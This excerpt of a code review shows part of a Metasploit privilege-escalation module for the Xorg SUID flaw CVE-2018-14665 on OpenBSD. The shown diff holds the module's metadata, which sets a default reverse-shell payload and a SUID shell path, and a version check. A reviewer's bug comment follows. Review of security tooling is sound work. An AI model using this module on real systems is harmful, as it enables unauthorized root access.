modules/exploits/openbsd/local/xorg_x11_suid_server.rb

```diff
@@ -0,0 +1,190 @@
+        that start the server the ability to elevate privileges and run
+        arbitrary code under root privileges.
+
+        This module writes a cron job using the Xorg -logfile option. On write
+        crontab.old will be created so it must be removed after exploit.  Cron
+        will then run a small script to launch a payload. It has been tested with
+        OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
+        on CentOS depends on the session having console for starting Xorg
+        along with selinux settings, may work but is currently not supported.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Narendra Shinde', # Discovery and exploit
+          'Raptor - 0xdea',  # Modified exploit for cron
+          'Aaron Ringo'      # Metasploit module
+        ],
+      'DisclosureDate' => 'Oct 25 2018',
+      'References'     =>
+        [
+           [ 'CVE', '2018-14665' ],
+           [ 'BID', '105741' ],
+           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
+           [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
+        ],
+      'Platform'       =>  %w(unix openbsd),
+      'Arch'           =>    ARCH_CMD,
+      'SessionTypes'   =>    'shell',
+      'Targets'        =>
+        [
+           ['OpenBSD', {
+            'Platform' => 'unix',
+            'Arch' => [ ARCH_CMD ] } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'cmd/unix/reverse_openssl'
+        },
+
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
+        OptBool.new('BUILTIN', [ true, 'Privesc in current session', true ])
+      ])
+     register_advanced_options(
+      [
+         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ])
+      ]
+    )
+  end
+
+
+  def check
+    #suid program check
+    xorg_path = cmd_exec("which Xorg")
+    unless xorg_path.include?("Xorg")
+      vprint_good "Xorg path was: #{xorg_path}"
+      return CheckCode::Safe
+    end
+    vprint_good "Xorg path found at #{xorg_path}"
+    unless setuid? xorg_path
+      vprint_error "Xorg binary #{xorg_path} is not SUID"
+      return CheckCode::Safe
+    end
+    vprint_good "Xorg binary #{xorg_path} is SUID"
+
+    #version check
+    x_version = cmd_exec("Xorg -version")
+    v = Gem::Version.new(x_version.scan(/\d.\d+.\d/).first)
+    unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.3'))
+      fail_with Failure::NotVulnerable, "Xorg version #{v} not supported"
+    end
+    vprint_good "Xorg version #{v} is vulnerable"
+
+    #process check
+    proc_list = []
+    proc_list = cmd_exec("ps ax")
+    if proc_list.include?('X')
```

Comment:
`proc_list` is a string. This conditional will match if there's an `X` anywhere in any of the `ps ax` output.